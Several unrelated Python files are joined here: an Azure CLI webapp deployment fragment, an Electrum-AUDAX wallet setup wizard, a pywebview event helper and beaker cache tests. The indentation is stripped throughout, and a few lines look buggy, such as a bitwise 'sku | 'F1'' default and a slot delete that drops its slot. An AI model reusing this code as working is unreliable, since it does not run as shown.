return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def create_deploy_webapp(cmd, name, location=None, sku=None, dryrun=False): # pylint: disable=too-many-statements
import os
client = web_client_factory(cmd.cli_ctx)
# the code to deploy is expected to be the current directory the command is running from
src_dir = os.getcwd()
# if dir is empty, show a message in dry run
do_deployment = False if os.listdir(src_dir) == [] else True
_create_new_rg = True
_create_new_asp = True
_create_new_app = True
_set_build_appSetting = False
# determine the details for app to be created from src contents
lang_details = get_lang_from_content(src_dir)
# we support E2E create and deploy for selected stacks, any other stack, set defaults for os & runtime
# and skip deployment
if lang_details['language'] is None:
do_deployment = False
sku = sku | 'F1'
os_val = OS_DEFAULT
detected_version = '-'
runtime_version = '-'
else:
# update SKU to user set value
if sku is None:
sku = lang_details.get("default_sku")
else:
sku = sku
language = lang_details.get("language")
is_skip_build = language.lower() == STATIC_RUNTIME_NAME
os_val = "Linux" if language.lower() == NODE_RUNTIME_NAME \
or language.lower() == PYTHON_RUNTIME_NAME else OS_DEFAULT
# detect the version
data = get_runtime_version_details(lang_details.get('file_loc'), language)
version_used_create = data.get('to_create')
detected_version = data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
full_sku = get_sku_name(sku)
loc_name = set_location(cmd, sku, location)
is_linux = True if os_val == 'Linux' else False
asp = "appsvc_asp_{}_{}".format(os_val, loc_name)
rg_name = "appsvc_rg_{}_{}".format(os_val, loc_name)
# Resource group: check if default RG is set
default_rg = cmd.cli_ctx.config.get('defaults', 'group', fallback=None)
_create_new_rg = should_create_new_rg(cmd, default_rg, rg_name, is_linux)
src_path = "{}".format(src_dir.replace("\\", "\\\\"))
rg_str = "{}".format(rg_name)
dry_run_str = r""" {
"name" : "%s",
"serverfarm" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"version_detected": "%s",
"version_to_create": "%s"
}
""" % (name, asp, rg_str, full_sku, os_val, location, src_path,
detected_version, runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
# create RG if the RG doesn't already exist
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
_create_new_asp = True
else:
logger.warning("Resource group '%s' already exists.", rg_name)
_create_new_asp = check_if_asp_exists(cmd, rg_name, asp, location)
# create new ASP if an existing one cannot be used
if _create_new_asp:
logger.warning("Creating App service plan '%s' ...", asp)
sku_def = SkuDescription(tier=full_sku, name=sku, capacity=(1 if is_linux else None))
plan_def = AppServicePlan(location=loc_name, app_service_plan_name=asp,
sku=sku_def, reserved=(is_linux or None))
client.app_service_plans.create_or_update(rg_name, asp, plan_def)
logger.warning("App service plan creation complete")
_create_new_app = True
else:
logger.warning("App service plan '%s' already exists.", asp)
_create_new_asp = False
_create_new_app = check_app_exists(cmd, rg_name, name)
# create the app
if _create_new_app:
logger.warning("Creating app '%s' ....", name)
create_webapp(cmd, rg_name, name, asp, runtime_version if is_linux else None)
logger.warning("Webapp creation complete")
_set_build_appSetting = True
else:
logger.warning("App '%s' already exists", name)
if do_deployment:
# setting the appsettings causes a app restart so we avoid if not needed
_app_settings = get_app_settings(cmd, rg_name, name)
if all(not d for d in _app_settings):
_set_build_appSetting = True
elif '"name": "SCM_DO_BUILD_DURING_DEPLOYMENT", "value": "true"' not in json.dumps(_app_settings[0]):
_set_build_appSetting = True
else:
_set_build_appSetting = False
# update create_json to include the app_url
url = _get_url(cmd, rg_name, name)
if do_deployment and not is_skip_build and _set_build_appSetting:
# setting to build after deployment
logger.warning("Updating app settings to enable build after deployment")
update_app_settings(cmd, rg_name, name, ["SCM_DO_BUILD_DURING_DEPLOYMENT=true"])
# work around until the timeout limits issue for linux is investigated & fixed
# wakeup kudu, by making an SCM call
import time
time.sleep(5)
_ping_scm_site(cmd, rg_name, name)
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
logger.warning("Preparing to deploy %s contents to app.",
'' if is_skip_build else 'and build')
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
# Remove the file afer deployment, handling exception if user removed the file manually
try:
os.remove(zip_file_path)
except OSError:
pass
create_json.update({'app_url': url})
logger.warning("All done.")
return create_json
def _ping_scm_site(cmd, resource_group, name):
# wakeup kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization)
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum_audax.wallet import Wallet, Abstract_Wallet
from electrum_audax.storage import WalletStorage
from electrum_audax.util import UserCancelled, InvalidPassword, WalletFileException
from electrum_audax.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_audax.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum_audax.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
BaseWizard.__init__(self, config, plugins)
self.setWindowTitle('Electrum-AUDAX - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-AUDAX wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
self.logger.exception('')
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
self.logger.exception('')
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
self.logger.exception('')
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
event.py
|
import inspect
import multiprocessing
import threading
import logging
logger = logging.getLogger('pywebview')
class Event:
def __init__(self, should_lock=False):
self._items = []
self._should_lock = should_lock
self._event = threading.Event()
def _initialize(self, is_multiprocessing):
if is_multiprocessing:
self._event = multiprocessing.Event()
def set(self, *args, **kwargs):
def execute():
for func in self._items:
try:
if len(inspect.signature(func).parameters.values()) == 0:
value = func()
else:
value = func(*args, **kwargs)
return_values.add(value)
except Exception as e:
logger.exception(e)
if self._should_lock:
semaphore.release()
semaphore = threading.Semaphore(0)
return_values = set()
if len(self._items):
t = threading.Thread(target=execute)
t.start()
if self._should_lock:
semaphore.acquire()
false_values = [v for v in return_values if v is False]
self._event.set()
return len(false_values) != 0
def is_set(self):
return self._event.is_set()
def wait(self, timeout=0):
return self._event.wait(timeout)
def clear(self):
return self._event.clear()
def __add__(self, item):
self._items.append(item)
return self
def __sub__(self, item):
self._items.remove(item)
return self
def __iadd__(self, item):
self._items.append(item)
return self
def __isub__(self, item):
self._items.remove(item)
return self
|
base.py
|
# coding: utf-8
import threading
import unittest
import time
import datetime
from beaker._compat import u_
from beaker.cache import Cache
from beaker.middleware import SessionMiddleware, CacheMiddleware
from webtest import TestApp as WebTestApp
class CacheManagerBaseTests(unittest.TestCase):
SUPPORTS_EXPIRATION = True
SUPPORTS_TIMEOUT = True
CACHE_ARGS = {}
@classmethod
def setUpClass(cls):
def simple_session_app(environ, start_response):
session = environ['beaker.session']
sess_id = environ.get('SESSION_ID')
if environ['PATH_INFO'].startswith('/invalid'):
# Attempt to access the session
id = session.id
session['value'] = 2
else:
if sess_id:
session = session.get_by_id(sess_id)
if not session:
start_response('200 OK', [('Content-type', 'text/plain')])
return [("No session id of %s found." % sess_id).encode('utf-8')]
if not session.has_key('value'):
session['value'] = 0
session['value'] += 1
if not environ['PATH_INFO'].startswith('/nosave'):
session.save()
start_response('200 OK', [('Content-type', 'text/plain')])
return [('The current value is: %d, session id is %s' % (session['value'],
session.id)).encode('utf-8')]
def simple_app(environ, start_response):
extra_args = cls.CACHE_ARGS
clear = False
if environ.get('beaker.clear'):
clear = True
cache = environ['beaker.cache'].get_cache('testcache', **extra_args)
if clear:
cache.clear()
try:
value = cache.get_value('value')
except:
value = 0
cache.set_value('value', value + 1)
start_response('200 OK', [('Content-type', 'text/plain')])
return [('The current value is: %s' % cache.get_value('value')).encode('utf-8')]
def using_none_app(environ, start_response):
extra_args = cls.CACHE_ARGS
clear = False
if environ.get('beaker.clear'):
clear = True
cache = environ['beaker.cache'].get_cache('testcache', **extra_args)
if clear:
cache.clear()
try:
value = cache.get_value('value')
except:
value = 10
cache.set_value('value', None)
start_response('200 OK', [('Content-type', 'text/plain')])
return [('The current value is: %s' % value).encode('utf-8')]
def cache_manager_app(environ, start_response):
cm = environ['beaker.cache']
cm.get_cache('test')['test_key'] = 'test value'
start_response('200 OK', [('Content-type', 'text/plain')])
yield ("test_key is: %s\n" % cm.get_cache('test')['test_key']).encode('utf-8')
cm.get_cache('test').clear()
try:
test_value = cm.get_cache('test')['test_key']
except KeyError:
yield "test_key cleared".encode('utf-8')
else:
yield (
"test_key wasn't cleared, is: %s\n" % cm.get_cache('test')['test_key']
).encode('utf-8')
cls.simple_session_app = staticmethod(simple_session_app)
cls.simple_app = staticmethod(simple_app)
cls.using_none_app = staticmethod(using_none_app)
cls.cache_manager_app = staticmethod(cache_manager_app)
def setUp(self):
Cache('test', **self.CACHE_ARGS).clear()
def test_session(self):
app = WebTestApp(SessionMiddleware(self.simple_session_app, **self.CACHE_ARGS))
res = app.get('/')
assert 'current value is: 1' in res
res = app.get('/')
assert 'current value is: 2' in res
res = app.get('/')
assert 'current value is: 3' in res
def test_session_invalid(self):
app = WebTestApp(SessionMiddleware(self.simple_session_app, **self.CACHE_ARGS))
res = app.get('/invalid', headers=dict(
Cookie='beaker.session.id=df7324911e246b70b5781c3c58328442; Path=/'))
assert 'current value is: 2' in res
def test_session_timeout(self):
app = WebTestApp(SessionMiddleware(self.simple_session_app, timeout=1, **self.CACHE_ARGS))
session = app.app._get_session()
session.save()
if self.SUPPORTS_TIMEOUT:
assert session.namespace.timeout == 121
res = app.get('/')
assert 'current value is: 1' in res
res = app.get('/')
assert 'current value is: 2' in res
res = app.get('/')
assert 'current value is: 3' in res
def test_has_key(self):
cache = Cache('test', **self.CACHE_ARGS)
o = object()
cache.set_value("test", o)
assert cache.has_key("test")
assert "test" in cache
assert not cache.has_key("foo")
assert "foo" not in cache
cache.remove_value("test")
assert not cache.has_key("test")
def test_clear(self):
cache = Cache('test', **self.CACHE_ARGS)
cache.set_value('test', 20)
cache.set_value('fred', 10)
assert cache.has_key('test')
